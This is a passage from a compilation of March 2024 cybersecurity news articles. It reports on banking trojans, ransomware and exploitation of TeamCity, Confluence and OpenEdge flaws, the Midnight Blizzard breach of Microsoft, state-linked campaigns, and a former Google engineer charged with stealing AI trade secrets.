It also comes days after the U.S. arrested a former Google engineer for allegedly stealing proprietary information from the tech giant while covertly working for two China-based companies, including one founded by him last year prior to his resignation.
New Banking Trojan CHAVECLOAK Targets Brazilian Users via Phishing Tactics
12.3.24
Virus
The Hacker News
Users in Brazil are the target of a new banking trojan
known as CHAVECLOAK that's propagated via phishing emails bearing PDF
attachments.
"This intricate attack involves the PDF downloading a ZIP file and subsequently utilizing DLL side-loading techniques to execute the final malware," Fortinet FortiGuard Labs researcher Cara Lin said.
The attack chain involves the use of contract-themed DocuSign lures to trick users into opening PDF files containing a button to read and sign the documents.
In reality, clicking the button leads to the retrieval of an installer file from a remote link that's shortened using the Goo.su URL shortening service.
Present within the installer is an executable named "Lightshot.exe" that leverages DLL side-loading to load "Lightshot.dll," which is the CHAVECLOAK malware that facilitates the theft of sensitive information.
This includes gathering system metadata and running checks to determine whether the compromised machine is located in Brazil and, if so, periodically monitoring the foreground window to compare it against a predefined list of bank-related strings.
If it matches, a connection is established with a command-and-control (C2) server and proceeds to harvest various kinds of information and exfiltrate them to distinct endpoints on the server depending on the financial institution.
"The malware facilitates various actions to steal a victim's credentials, such as allowing the operator to block the victim's screen, log keystrokes, and display deceptive pop-up windows," Lin said.
"The malware actively monitors the victim's access to specific financial portals, including several banks and Mercado Bitcoin, which encompasses both traditional banking and cryptocurrency platforms."
Fortinet said it also uncovered a Delphi variant of CHAVECLOAK, once again highlighting the prevalence of Delphi-based malware targeting Latin America.
"The emergence of the CHAVECLOAK banking Trojan underscores the evolving
landscape of cyberthreats targeting the financial sector, specifically focusing
on users in Brazil," Lin concluded.
The findings come amid an ongoing mobile banking fraud campaign against the U.K., Spain, and Italy that entails using smishing and vishing (i.e., SMS and voice phishing) tactics to deploy an Android malware called Copybara with the goal of performing unauthorized banking transfers to a network of bank accounts operated by money mules.
"TAs [Threat actors] have been caught using a structured way of managing all the ongoing phishing campaigns via a centralized web panel known as 'Mr. Robot,'" Cleafy said in a report published last week.
"With this panel, TAs can enable and manage multiple phishing campaigns (against
different financial institutions) based on their needs."
The C2 framework also allows attackers to orchestrate tailored attacks on distinct financial institutions using phishing kits that are engineered to mimic the user interface of the targeted entity, while also adopting anti-detection methods via geofencing and device fingerprinting to limit connections only from mobile devices.
The phishing kit – which serves as a fake login page – is responsible for
capturing retail banking customer credentials and phone numbers and sending the
details to a Telegram group.
Some of the malicious infrastructure used for the campaign is designed to deliver Copybara, which is managed using a C2 panel named JOKER RAT that displays all the infected devices and their geographical distribution over a live map.
It also allows the threat actors to remotely interact in real-time with an infected device using a VNC module, in addition to injecting fake overlays on top of banking apps to siphon credentials, logging keystrokes by abusing Android's accessibility services, and intercepting SMS messages.
On top of that, JOKER RAT comes with an APK builder that makes it possible to customize the rogue app's name, package name, and icons.
"Another feature available inside the panel is the 'Push Notification,' probably used to send to the infected devices fake push notifications that look like a bank notification to entice the user to open the bank's app in such a way that the malware can steal credentials," Cleafy researchers Francesco Iubatti and Federico Valentini said.
The growing sophistication of on-device fraud (ODF) schemes is further evidenced by a recently disclosed TeaBot (aka Anatsa) campaign that managed to infiltrate the Google Play Store under the guise of PDF reader apps.
"This application serves as a dropper, facilitating the download of a banking trojan of the TeaBot family through multiple stages," Iubatti said. "Before downloading the banking trojan, the dropper performs advanced evasion techniques, including obfuscation and file deletion, alongside multiple checks about the victim countries."
BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware Attacks
11.3.24
Ransom
The Hacker News
The threat actors behind the BianLian ransomware have
been observed exploiting security flaws in JetBrains TeamCity software to
conduct their extortion-only attacks.
According to a new report from GuidePoint Security, which responded to a recent intrusion, the incident "began with the exploitation of a TeamCity server which resulted in the deployment of a PowerShell implementation of BianLian's Go backdoor."
BianLian emerged in June 2022, and has since pivoted exclusively to exfiltration-based extortion following the release of a decryptor in January 2023.
The attack chain observed by the cybersecurity firm entails the exploitation of a vulnerable TeamCity instance using CVE-2024-27198 or CVE-2023-42793 to gain initial access to the environment, followed by creating new users in the build server and executing malicious commands for post-exploitation and lateral movement.
It's currently not clear which of the two flaws were weaponized by the threat actor for infiltration.
BianLian actors are known to implant a custom backdoor tailored to each victim written in Go, as well as drop remote desktop tools like AnyDesk, Atera, SplashTop, and TeamViewer. The backdoor is tracked by Microsoft as BianDoor.
"After multiple failed attempts to execute their standard Go backdoor, the threat actor pivoted to living-off-the-land and leveraged a PowerShell implementation of their backdoor, which provides an almost identical functionality to what they would have with their Go backdoor," security researchers Justin Timothy, Gabe Renfro, and Keven Murphy said.
The obfuscated PowerShell backdoor ("web.ps1") is designed to establish a TCP socket for additional network communication to an actor-controlled server, allowing the remote attackers to conduct arbitrary actions on an infected host.
"The now-confirmed backdoor is able to communicate with the [command-and-control] server and asynchronously execute based on the remote attacker's post-exploitation objectives," the researchers said.
The disclosure comes as VulnCheck detailed fresh proof-of-concept (PoC) exploits for a critical security flaw impacting Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527) that could lead to remote code execution in a fileless manner and load the Godzilla web shell directly into memory.
The flaw has since been weaponized to deploy C3RB3R ransomware, cryptocurrency miners and remote access trojans over the past two months, indicating widespread exploitation in the wild.
"There's more than one way to reach Rome," VulnCheck's Jacob Baines noted. "While using freemarker.template.utility.Execute appears to be the popular way of exploiting CVE-2023-22527, other more stealthy paths generate different indicators."
Proof-of-Concept Exploit Released for Progress Software OpenEdge Vulnerability
11.3.24
Exploit
The Hacker News
Technical specifics and a proof-of-concept (PoC) exploit
have been made available for a recently disclosed critical security flaw in
Progress Software OpenEdge Authentication Gateway and AdminServer, which could
be potentially exploited to bypass authentication protections.
Tracked as CVE-2024-1403, the vulnerability has a maximum severity rating of 10.0 on the CVSS scoring system. It impacts OpenEdge versions 11.7.18 and earlier, 12.2.13 and earlier, and 12.8.0.
"When the OpenEdge Authentication Gateway (OEAG) is configured with an OpenEdge Domain that uses the OS local authentication provider to grant user-id and password logins on operating platforms supported by active releases of OpenEdge, a vulnerability in the authentication routines may lead to unauthorized access on attempted logins," the company said in an advisory released late last month.
"Similarly, when an AdminServer connection is made by OpenEdge Explorer (OEE) and OpenEdge Management (OEM), it also utilizes the OS local authentication provider on supported platforms to grant user-id and password logins that may also lead to unauthorized login access."
Progress Software said the vulnerability incorrectly returns authentication success from an OpenEdge local domain if unexpected types of usernames and passwords are not appropriately handled, leading to unauthorized access sans proper authentication.
The flaw has been addressed in versions OpenEdge LTS Update 11.7.19, 12.2.14, and 12.8.1.
Horizon3.ai, which reverse-engineered the vulnerable AdminServer service, has since released a PoC for CVE-2024-1403, stating the issue is rooted in a function called connect() that's invoked when a remote connection is made.
This function, in turn, calls another function called authorizeUser() that validates that the supplied credentials meet certain criteria, and passes control to another part of the code that directly authenticates the user if the provided username matches "NT AUTHORITY\SYSTEM."
"Deeper attacker surface looks like it may allow a user to deploy new applications via remote WAR file references, but the complexity increased dramatically in order to reach this attack surface because of the use of internal service message brokers and custom messages," security researcher Zach Hanley said.
"We believe there is again likely an avenue to remote code execution via built in functionality given enough research effort."
Magnet Goblin Hacker Group Leveraging 1-Day Exploits to Deploy Nerbian RAT
11.3.24
Virus
The Hacker News
A financially motivated threat actor called Magnet Goblin
is swiftly adopting one-day security vulnerabilities into its arsenal in order
to opportunistically breach edge devices and public-facing services and deploy
malware on compromised hosts.
"Threat actor group Magnet Goblin's hallmark is its ability to swiftly leverage newly disclosed vulnerabilities, particularly targeting public-facing servers and edge devices," Check Point said.
"In some cases, the deployment of the exploits is within 1 day after a [proof-of-concept] is published, significantly increasing the threat level posed by this actor."
Attacks mounted by the adversary have leveraged unpatched Ivanti Connect Secure VPN, Magento, Qlik Sense, and possibly Apache ActiveMQ servers as an initial infection vector to gain unauthorized access. The group is said to be active since at least January 2022.
A successful exploitation is followed by the deployment of a cross-platform remote access trojan (RAT) dubbed Nerbian RAT, which was first disclosed by Proofpoint in May 2022, as well as its simplified variant called MiniNerbian. The use of the Linux version of Nerbian RAT was previously highlighted by Darktrace.
Both the strains allow for execution of arbitrary commands received from a
command-and-control (C2) server and exfiltrating the results backed to it.
Some of the other tools used by Magnet Goblin include the WARPWIRE JavaScript credential stealer, the Go-based tunneling software known as Ligolo, and legitimate remote desktop offerings such as AnyDesk and ScreenConnect.
"Magnet Goblin, whose campaigns appear to be financially motivated, has been quick to adopt 1-day vulnerabilities to deliver their custom Linux malware, Nerbian RAT and MiniNerbian," the company said.
"Those tools have operated under the radar as they mostly reside on edge-devices. This is part of an ongoing trend for threat actors to target areas which until now have been left unprotected."
Microsoft Confirms Russian Hackers Stole Source Code, Some Customer Secrets
9.3.24
APT
The Hacker News
Microsoft on Friday revealed that the Kremlin-backed
threat actor known as Midnight Blizzard (aka APT29 or Cozy Bear) managed to gain
access to some of its source code repositories and internal systems following a
hack that came to light in January 2024.
"In recent weeks, we have seen evidence that Midnight Blizzard is using information initially exfiltrated from our corporate email systems to gain, or attempt to gain, unauthorized access," the tech giant said.
"This has included access to some of the company's source code repositories and internal systems. To date we have found no evidence that Microsoft-hosted customer-facing systems have been compromised."
Redmond, which is continuing to investigate the extent of the breach, said the Russian state-sponsored threat actor is attempting to leverage the different types of secrets it found, including those that were shared between customers and Microsoft in email.
It, however, did not disclose what these secrets were or the scale of the compromise, although it said it has directly reached out to impacted customers. It's not clear what source code was accessed.
Stating that it has increased in its security investments, Microsoft further noted that the adversary ramped up its password spray attacks by as much as 10-fold in February, compared to the "already large volume" observed in January.
"Midnight Blizzard's ongoing attack is characterized by a sustained, significant commitment of the threat actor's resources, coordination, and focus," it said.
"It may be using the information it has obtained to accumulate a picture of areas to attack and enhance its ability to do so. This reflects what has become more broadly an unprecedented global threat landscape, especially in terms of sophisticated nation-state attacks."
The Microsoft breach is said to have taken place in November 2023, with Midnight Blizzard employing a password spray attack to successfully infiltrate a legacy, non-production test tenant account that did not have multi-factor authentication (MFA) enabled.
The tech giant, in late January, revealed that APT29 had targeted other organizations by taking advantage of a diverse set of initial access methods ranging from stolen credentials to supply chain attacks.
Midnight Blizzard is considered part of Russia's Foreign Intelligence Service (SVR). Active since at least 2008, the threat actor is one of the most prolific and sophisticated hacking groups, compromising high-profile targets such as SolarWinds.
Meta Details WhatsApp and Messenger Interoperability to Comply with EU's DMA
Regulations
8.3.24
Social
The Hacker News
Meta has offered details on how it intends to implement interoperability in WhatsApp and Messenger with third-party messaging services as the Digital Markets Act (DMA) went into effect in the European Union.
"This allows users of third-party providers who choose to enable interoperability (interop) to send and receive messages with opted-in users of either Messenger or WhatsApp – both designated by the European Commission (EC) as being required to independently provide interoperability to third-party messaging services," Meta's Dick Brouwer said.
DMA, which officially became enforceable on March 7, 2024, requires companies in gatekeeper positions – Apple, Alphabet, Meta, Amazon, Microsoft, and ByteDance – to clamp down on anti-competitive practices from tech players, level the playing field, as well as compel them to open some of their services to competitors.
As part of its efforts to comply with the landmark regulations, the social media giant said it expects third-party providers to use the Signal Protocol, which is used in both WhatsApp and Messenger for end-to-end encryption (E2EE).
The third-parties are also required to package the encrypted communications into message stanzas in eXtensible Markup Language (XML). Should the message contain media content, an encrypted version is downloaded by Meta clients from the third-party messaging servers using a Meta proxy service.
The company is also proposing what's called a "plug-and-play" model that allows third-party providers to connect to its infrastructure for achieving interoperability.
"Taking the example of WhatsApp, third-party clients will connect to WhatsApp servers using our protocol (based on the Extensible Messaging and Presence Protocol – XMPP)," Brouwer said.
"The WhatsApp server will interface with a third-party server over HTTP in order to facilitate a variety of things including authenticating third-party users and push notifications."
Furthermore, third-party clients are mandated to execute a WhatsApp Enlistment API when opting into its network, alongside providing cryptographic proof of their ownership of the third-party user-visible identifier when connecting or a third-party user registers on WhatsApp or Messenger.
The technical architecture also has provisions for a third-party provider to add a proxy or an intermediary between their client and the WhatsApp server to provide more information about the kinds of content their client can receive from the WhatsApp server.
"The challenge here is that WhatsApp would no longer have direct connection to both clients and, as a result, would lose connection level signals that are important for keeping users safe from spam and scams such as TCP fingerprints," Brouwer noted.
"This approach also exposes all the chat metadata to the proxy server, which increases the likelihood that this data could be accidentally or intentionally leaked."
Cisco Issues Patch for High-Severity VPN Hijacking Bug in Secure Client
8.3.24
Vulnerebility
The Hacker News
Cisco has released patches to address a high-severity
security flaw impacting its Secure Client software that could be exploited by a
threat actor to open a VPN session with that of a targeted user.
The networking equipment company described the vulnerability, tracked as CVE-2024-20337 (CVSS score: 8.2), as allowing an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user.
Arising as a result of insufficient validation of user-supplied input, a threat actor could leverage the flaw to trick a user into clicking on a specially crafted link while establishing a VPN session.
"A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token," the company said in an advisory.
"The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access."
The vulnerability impacts Secure Client for Windows, Linux, and macOS, and has been addressed in the following versions -
Earlier than 4.10.04065 (not vulnerable)
4.10.04065 and later (fixed in
4.10.08025)
5.0 (migrate to a fixed release)
5.1 (fixed in 5.1.2.42)
Amazon security researcher Paulos Yibelo Mesfin has been credited with
discovering and reporting the flaw, telling The Hacker News that the shortcoming
allows attackers to access local internal networks when a target visits a
website under their control.
Cisco has also published fixes for CVE-2024-20338 (CVSS score: 7.3), another high-severity flaw in Secure Client for Linux that could permit an authenticated, local attacker to elevate privileges on an affected device. It has been resolved in version 5.1.2.42.
"An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process," it said. "A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges."
QEMU Emulator Exploited as Tunneling Tool to Breach Company Network
8.3.24
Exploit
The Hacker News
Threat actors have been observed leveraging the QEMU open-source hardware emulator as tunneling software during a cyber attack targeting an unnamed "large company" to connect to their infrastructure.
While a number of legitimate tunneling tools like Chisel, FRP, ligolo, ngrok, and Plink have been used by adversaries to their advantage, the development marks the first QEMU that has been used for this purpose.
"We found that QEMU supported connections between virtual machines: the -netdev option creates network devices (backend) that can then connect to the virtual machines," Kaspersky researchers Grigory Sablin, Alexander Rodchenko, and Kirill Magaskin said.
"Each of the numerous network devices is defined by its type and supports extra options."
In other words, the idea is to create a virtual network interface and a socket-type network interface, thereby allowing the virtual machine to communicate with any remote server.
The Russian cybersecurity company said it was able to use QEMU to set up a network tunnel from an internal host within the enterprise network that didn't have internet access to a pivot host with internet access, which connects to the attacker's server on the cloud running the emulator.
The findings show that threat actors are continuously diversifying their attack
strategies to blend their malicious traffic with actual activity and meet their
operational goals.
"Malicious actors using legitimate tools to perform various attack steps is nothing new to incident response professionals," the researchers said.
"This further supports the concept of multi-level protection, which covers both reliable endpoint protection, and specialized solutions for detecting and protecting against complex and targeted attacks including human-operated ones."
CISA Warns of Actively Exploited JetBrains TeamCity Vulnerability
8.3.24
Exploit
The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency
(CISA) on Thursday added a critical security flaw impacting JetBrains TeamCity
On-Premises software to its Known Exploited Vulnerabilities (KEV) catalog, based
on evidence of active exploitation.
The vulnerability, tracked as CVE-2024-27198 (CVSS score: 9.8), refers to an authentication bypass bug that allows for a complete compromise of a susceptible server by a remote unauthenticated attacker.
It was addressed by JetBrains earlier this week alongside CVE-2024-27199 (CVSS score: 7.3), another moderate-severity authentication bypass flaw that allows for a "limited amount" of information disclosure and system modification.
"The vulnerabilities may enable an unauthenticated attacker with HTTP(S) access to a TeamCity server to bypass authentication checks and gain administrative control of that TeamCity server," the company noted at the time.
Threat actors have been observed weaponizing the twin flaws to deliver Jasmin
ransomware as well as create hundreds of rogue user accounts, according to
CrowdStrike and LeakIX. The Shadowserver Foundation said it detected
exploitation attempts starting from March 4, 2024.
Statistics shared by GreyNoise show that CVE-2024-27198 has come under broad exploitation from over a dozen unique IP addresses shortly after public disclosure of the flaw.
In light of active exploitation, users running on-premises versions of the software are advised to apply the updates as soon as possible to mitigate potential threats. Federal agencies are required to patch their instances by March 28, 2024.
Hacked WordPress Sites Abusing Visitors' Browsers for Distributed Brute-Force
Attacks
7.3.24
Attack
The Hacker News
Threat actors are conducting brute-force attacks against WordPress sites by leveraging malicious JavaScript injections, new findings from Sucuri reveal.
The attacks, which take the form of distributed brute-force attacks, "target WordPress websites from the browsers of completely innocent and unsuspecting site visitors," security researcher Denis Sinegubko said.
The activity is part of a previously documented attack wave in which compromised WordPress sites were used to inject crypto drainers such as Angel Drainer directly or redirect site visitors to Web3 phishing sites containing drainer malware.
The latest iteration is notable for the fact that the injections – found on over 700 sites to date – don't load a drainer but rather use a list of common and leaked passwords to brute-force other WordPress sites.
The attack unfolds over five stages, enabling a threat actor to take advantage of already compromised websites to launch distributed brute-force attacks against other potential victim sites -
Obtaining a list of target WordPress sites
Extracting real usernames of
authors that post on those domains
Inject the malicious JavaScript code to
already infected WordPress sites
Launching a distributed brute-force attack
on the target sites via the browser when visitors land on the hacked sites
Gaining unauthorized access to the target sites
"For every password in the
list, the visitor's browser sends the wp.uploadFile XML-RPC API request to
upload a file with encrypted credentials that were used to authenticate this
specific request," Sinegubko explained. "If authentication succeeds, a small
text file with valid credentials is created in the WordPress uploads directory."
It's currently not known what prompted the threat actors to switch from crypto drainers to distributed brute-force attack, although it's believed that the change may have been driven by profit motives, as compromised WordPress sites could be monetized in various ways.
That said, crypto wallet drainers have led to losses amounting to hundreds of millions in digital assets in 2023, according to data from Scam Sniffer. The Web3 anti-scam solution provider has since revealed that drainers are exploiting the normalization process in the wallet's EIP-712 encoding procedure to bypass security alerts.
The development comes as the DFIR report revealed that threat actors are exploiting a critical flaw in a WordPress plugin named 3DPrint Lite (CVE-2021-4436, CVSS score: 9.8) to deploy the Godzilla web shell for persistent remote access.
It also follows a new SocGholish (aka FakeUpdates) campaign targeting WordPress websites in which the JavaScript malware is distributed via modified versions of legitimate plugins that are installed by taking advantage of compromised admin credentials.
"Although there have been a variety of maliciously modified plugins and several different fake-browser update campaigns, the goal of course is always the same: To trick unsuspecting website visitors into downloading remote access trojans that will later be used as the initial point of entry for a ransomware attack," security researcher Ben Martin said.
Chinese State Hackers Target Tibetans with Supply Chain, Watering Hole Attacks
7.3.24
BigBrothers
The Hacker News
The China-linked threat actor known as Evasive Panda
orchestrated both watering hole and supply chain attacks targeting Tibetan users
at least since September 2023.
The end of the attacks is to deliver malicious downloaders for Windows and macOS that deploy a known backdoor called MgBot and a previously undocumented Windows implant known as Nightdoor.
The findings come from ESET, which said the attackers compromised at least three websites to carry out watering-hole attacks as well as a supply-chain compromise of a Tibetan software company. The operation was discovered in January 2024.
Evasive Panda, active since 2012 and also known as Bronze Highland and Daggerfly, was previously disclosed by the Slovak cybersecurity firm in April 2023 as having targeted an international non-governmental organization (NGO) in Mainland China with MgBot.
Another report from Broadcom-owned Symantec around the same time implicated the adversary to a cyber espionage campaign aimed at infiltrating telecom services providers in Africa at least since November 2022.
The latest set of cyber assaults entails the strategic web compromise of the Kagyu International Monlam Trust's website ("www.kagyumonlam[.]org").
"The attackers placed a script in the website that verifies the IP address of the potential victim and if it is within one of the targeted ranges of addresses, shows a fake error page to entice the user to download a 'fix' named certificate," ESET researchers said.
"This file is a malicious downloader that deploys the next stage in the
compromise chain." The IP address checks show that the attack is specifically
designed to target users in India, Taiwan, Hong Kong, Australia, and the U.S.
It's suspected that Evasive Panda capitalized on the annual Kagyu Monlam Festival that took place in India in late January and February 2024 to target the Tibetan community in several countries and territories.
The executable – named "certificate.exe" on Windows and "certificate.pkg" for macOS – serves as a launchpad for loading the Nightdoor implant, which, subsequently, abuses the Google Drive API for command-and-control (C2).
In addition, the campaign is notable for infiltrating an Indian software company's website ("monlamit[.]com") and supply chain in order to distribute trojanized Windows and macOS installers of the Tibetan language translation software. The compromise occurred in September 2023.
"The attackers also abused the same website and a Tibetan news website called Tibetpost – tibetpost[.]net – to host the payloads obtained by the malicious downloads, including two full-featured backdoors for Windows and an unknown number of payloads for macOS," the researchers noted.
The trojanized Windows installer, for its part, triggers a sophisticated multi-stage attack sequence to either drop MgBot or Nightdoor, signs of which have been detected as early as 2020.
The backdoor comes equipped with features to gather system information, list of
installed apps, and running processes; spawn a reverse shell, perform file
operations, and uninstall itself from the infected system.
"The attackers fielded several downloaders, droppers, and backdoors, including MgBot – which is used exclusively by Evasive Panda – and Nightdoor: the latest major addition to the group's toolkit and which has been used to target several networks in East Asia," ESET said.
Ex-Google Engineer Arrested for Stealing AI Technology Secrets for China
7.3.24
AI
The Hacker News
The U.S. Department of Justice (DoJ) announced the
indictment of a 38-year-old Chinese national and a California resident of
allegedly stealing proprietary information from Google while covertly working
for two China-based tech companies.
Linwei Ding (aka Leon Ding), a former Google engineer who was arrested on March 6, 2024, "transferred sensitive Google trade secrets and other confidential information from Google's network to his personal account while secretly affiliating himself with PRC-based companies in the AI industry," the DoJ said.
The defendant is said to have pilfered from Google over 500 confidential files containing artificial intelligence (AI) trade secrets with the goal of passing them on to two unnamed Chinese companies looking to gain an edge in the ongoing AI race.
"While Linwei Ding was employed as a software engineer at Google, he was secretly working to enrich himself and two companies based in the People's Republic of China," said U.S. Attorney Ismail Ramsey.
"By stealing Google's trade secrets about its artificial intelligence supercomputing systems, Ding gave himself and the companies that he affiliated with in the PRC an unfair competitive advantage."
Ding, who joined Google as a software engineer in 2019, has been accused of siphoning proprietary information related to the company's supercomputing data center infrastructure used for running AI models, the Cluster Management System (CMS) software for managing the data centers, and the AI models and applications they supported.
The theft happened from May 21, 2022, until May 2, 2023, to a personal Google Cloud account, the indictment alleged, adding Ding secretly affiliated himself with two tech companies based in China.
This included one firm in which he was offered the position of chief technology officer sometime around June 2022 and another company founded by Ding himself by no later than May 30, 2023, acting as its chief executive officer.
"Ding's company touted the development of a software platform designed to accelerate machine learning workloads, including training large AI models," the DoJ said.
"A document related to Ding's startup company stated, 'we have experience with
Google's ten-thousand-card computational power platform; we just need to
replicate and upgrade it – and then further develop a computational power
platform suited to China's national conditions.'"
But in an interesting twist, Ding took steps to conceal the theft of trade secrets by purportedly copying the data from Google source files into the Apple Notes application on his company-provided MacBook and then converting the notes to PDF files before uploading them to their Google account.
Furthermore, Ding allegedly allowed another Google employee in December 2023 to use his Google-issued access badge to scan into the entrance of a Google building, giving the impression that he was working from his U.S. Google office when, in fact, he was in China. He resigned from Google on December 26, 2023.
Ding has been charged with four counts of theft of trade secrets. If convicted, he faces a maximum penalty of 10 years in prison and up to a $250,000 fine for each count.
The development comes days after the DoJ arrested and indicted David Franklin Slater, a civilian employee of the U.S. Air Force assigned to the U.S. Strategic Command (USSTRATCOM), of transmitting classified information on a foreign online dating platform between February and April 2022.
The information included National Defense Information (NDI) pertaining to military targets and Russian military capabilities relating to Russia's invasion of Ukraine. It's said to have been sent to a co-conspirator, who claimed to be a female living in Ukraine, via the dating website's messaging feature.
"Slater willfully, improperly, and unlawfully transmitted NDI classified as 'SECRET,' which he had reason to believe could be used to the injury of the United States or to the advantage of a foreign nation, on a foreign online dating platform to a person not authorized to receive such information," the DoJ said.
Slater, 63, faces up to 10 years in prison, three years of supervised release, and a maximum monetary penalty of $250,000 for each count of conspiracy to transmit and the transmission of NDI. No details are known about the motives or the real identity of the individual posing as a Ukrainian woman.
New Python-Based Snake Info Stealer Spreading Through Facebook Messages
7.3.24
Virus
The Hacker News
Facebook messages are being used by threat actors to a Python-based information stealer dubbed Snake that's designed to capture credentials and other sensitive data.
"The credentials harvested from unsuspecting users are transmitted to different platforms such as Discord, GitHub, and Telegram," Cybereason researcher Kotaro Ogino said in a technical report.
Details about the campaign first emerged on the social media platform X in August 2023. The attacks entail sending prospective users seemingly innocuous RAR or ZIP archive files that, upon opening, activate the infection sequence.
The intermediate stages involve two downloaders – a batch script and a cmd script – with the latter responsible for downloading and executing the information stealer from an actor-controlled GitLab repository.
Cybereason said it detected three different variants of the stealer, the third one being an executable assembled by PyInstaller. The malware, for its part, is designed to gather data from different web browsers, including Cốc Cốc, suggesting a Vietnamese focus.
The collected information, which comprises credentials and cookies, is then exfiltrated in the form of a ZIP archive via the Telegram Bot API. The stealer is also designed to dump cookie information specific to Facebook, an indication that the threat actor is likely looking to hijack the accounts for their own purposes.
The Vietnamese connection is further bolstered by the naming convention of the GitHub and GitLab repositories and the fact that the source code contains references to the Vietnamese language.
"All of the variants support Cốc Cốc Browser, which is a well known Vietnamese
Browser used widely by the Vietnamese community," Ogino said.
Over the past year, multiple information stealers targeting Facebook cookies have appeared in the wild, counting S1deload Stealer, MrTonyScam, NodeStealer, and VietCredCare.
The development comes as Meta has come under criticism in the U.S. for failing to assist victims whose accounts have been hacked into, calling on the company to take immediate action to address a "dramatic and persistent spike" in account takeover incidents.
It also follows a discovery that threat actors are "using a cloned game cheat website, SEO poisoning, and a bug in GitHub to trick would-be-game-hackers into running Lua malware," according to OALABS Research.
Specifically, the malware operators are leveraging a GitHub vulnerability that allows an uploaded file associated with an issue on a repository to persist even in scenarios where the issue is never saved.
"This means that anyone can upload a file to any git repository on GitHub, and not leave any trace that the file exists except for the direct link," the researchers said, adding the malware comes fitted with capabilities for command-and-control (C2) communications.
Watch Out for Spoofed Zoom, Skype, Google Meet Sites Delivering Malware
7.3.24
Virus
The Hacker News
Threat actors have been leveraging fake websites advertising popular video conferencing software such as Google Meet, Skype, and Zoom to deliver a variety of malware targeting both Android and Windows users since December 2023.
"The threat actor is distributing Remote Access Trojans (RATs) including SpyNote RAT for Android platforms, and NjRAT and DCRat for Windows systems," Zscaler ThreatLabz researchers said.
The spoofed sites are in Russian and are hosted on domains that closely resemble their legitimate counterparts, indicating that the attackers are using typosquatting tricks to lure prospective victims into downloading the malware.
They also come with options to download the app for Android, iOS, and Windows platforms. While clicking on the button for Android downloads an APK file, clicking on the Windows app button triggers the download of a batch script.
The malicious batch script is responsible for executing a PowerShell script, which, in turn, downloads and executes the remote access trojan.
Currently, there is no evidence that the threat actor is targeting iOS users, given that clicking on the button for the iOS app takes the user to the legitimate Apple App Store listing for Skype.
"A threat actor is using these lures to distribute RATs for Android and Windows, which can steal confidential information, log keystrokes, and steal files," the researchers said.
The development comes as the AhnLab Security Intelligence Center (ASEC) revealed that a new malware dubbed WogRAT targeting both Windows and Linux is abusing a free online notepad platform called aNotepad as a covert vector for hosting and retrieving malicious code.
It's said to be active from at least late 2022, targeting Asian countries like
China, Hong Kong, Japan, and Singapore, among others. That said, it's currently
not known how the malware is distributed in the wild.
"When WogRAT is run for the first time, it collects basic information of the infected system and sends them to the C&C server," ASEC said. "The malware then supports commands such as executing commands, sending results, downloading files, and uploading these files."
It also coincides with high-volume phishing campaigns orchestrated by a financially motivated cybercriminal actor known as TA4903 to steal corporate credentials and likely follow them with business email compromise (BEC) attacks. The adversary has been active since at least 2019, with the activities intensifying post mid-2023.
"TA4903 routinely conducts campaigns spoofing various U.S. government entities to steal corporate credentials," Proofpoint said. "The actor also spoofs organizations in various sectors including construction, finance, healthcare, food and beverage, and others."
Attack chains involve the use of QR codes (aka quishing) for credential phishing as well as relying on the EvilProxy adversary-in-the-middle (AiTM) phishing kit to bypass two-factor authentication (2FA) protections.
Once a target mailbox is compromised, the threat actor has been observed searching for information relevant to payments, invoices, and bank information, with the ultimate goal of hijacking existing email threads and performing invoice fraud.
Phishing campaigns have also functioned as a conduit for other malware families like DarkGate, Agent Tesla, and Remcos RAT, the last of which leverages steganographic decoys to drop the malware on compromised hosts.
Hackers Exploit Misconfigured YARN, Docker, Confluence, Redis Servers for Crypto
Mining
7.3.24
Exploit
The Hacker News
Threat actors are targeting misconfigured and vulnerable
servers running Apache Hadoop YARN, Docker, Atlassian Confluence, and Redis
services as part of an emerging malware campaign designed to deliver a
cryptocurrency miner and spawn a reverse shell for persistent remote access.
"The attackers leverage these tools to issue exploit code, taking advantage of common misconfigurations and exploiting an N-day vulnerability, to conduct Remote Code Execution (RCE) attacks and infect new hosts," Cado security researcher Matt Muir said in a report shared with The Hacker News.
The activity has been codenamed Spinning YARN by the cloud security company, with overlaps to cloud attacks attributed to TeamTNT, WatchDog, and a cluster dubbed Kiss-a-dog.
It all starts with deploying four novel Golang payloads that are capable of automating the identification and exploitation of susceptible Confluence, Docker, Hadoop YARN, and Redis hosts. The spreader utilities leverage masscan or pnscan to hunt for these services.
"For the Docker compromise, the attackers spawn a container and escape from it onto the underlying host," Muir explained.
The initial access then paves the way for the deployment of additional tools to install rootkits like libprocesshider and diamorphine to conceal malicious processes, drop the Platypus open-source reverse shell utility, and ultimately launch the XMRig miner.
"It's clear that attackers are investing significant time into understanding the types of web-facing services deployed in cloud environments, keeping abreast of reported vulnerabilities in those services and using this knowledge to gain a foothold in target environments," the company said.
The development comes as Uptycs revealed 8220 Gang's exploitation of known security flaws in Apache Log4j (CVE-2021-44228) and Atlassian Confluence Server and Data Center (CVE-2022-26134) as part of a wave of assaults targeting cloud infrastructure from May 2023 through February 2024.
"By leveraging internet scans for vulnerable applications, the group identifies potential entry points into cloud systems, exploiting unpatched vulnerabilities to gain unauthorized access," security researchers Tejaswini Sandapolla and Shilpesh Trivedi said.
"Once inside, they deploy a series of advanced evasion techniques, demonstrating a profound understanding of how to navigate and manipulate cloud environments to their advantage. This includes disabling security enforcement, modifying firewall rules, and removing cloud security services, thereby ensuring their malicious activities remain undetected."
The attacks, which single out both Windows and Linux hosts, aim to deploy a cryptocurrency miner, but not before taking a series of steps that prioritize stealth and evasion.
It also follows the abuse of cloud services primarily meant for artificial intelligence (AI) solutions to drop cryptocurrency miners as well as host malware.
"With both mining and AI requiring access to large amounts of GPU processing power, there's a certain degree of transferability to their base hardware environments," HiddenLayer noted last year.
Cado, in its H2 2023 Cloud Threat Findings Report, noted that threat actors are increasingly targeting cloud services that require specialist technical knowledge to exploit, and that cryptojacking is no longer the only motive.
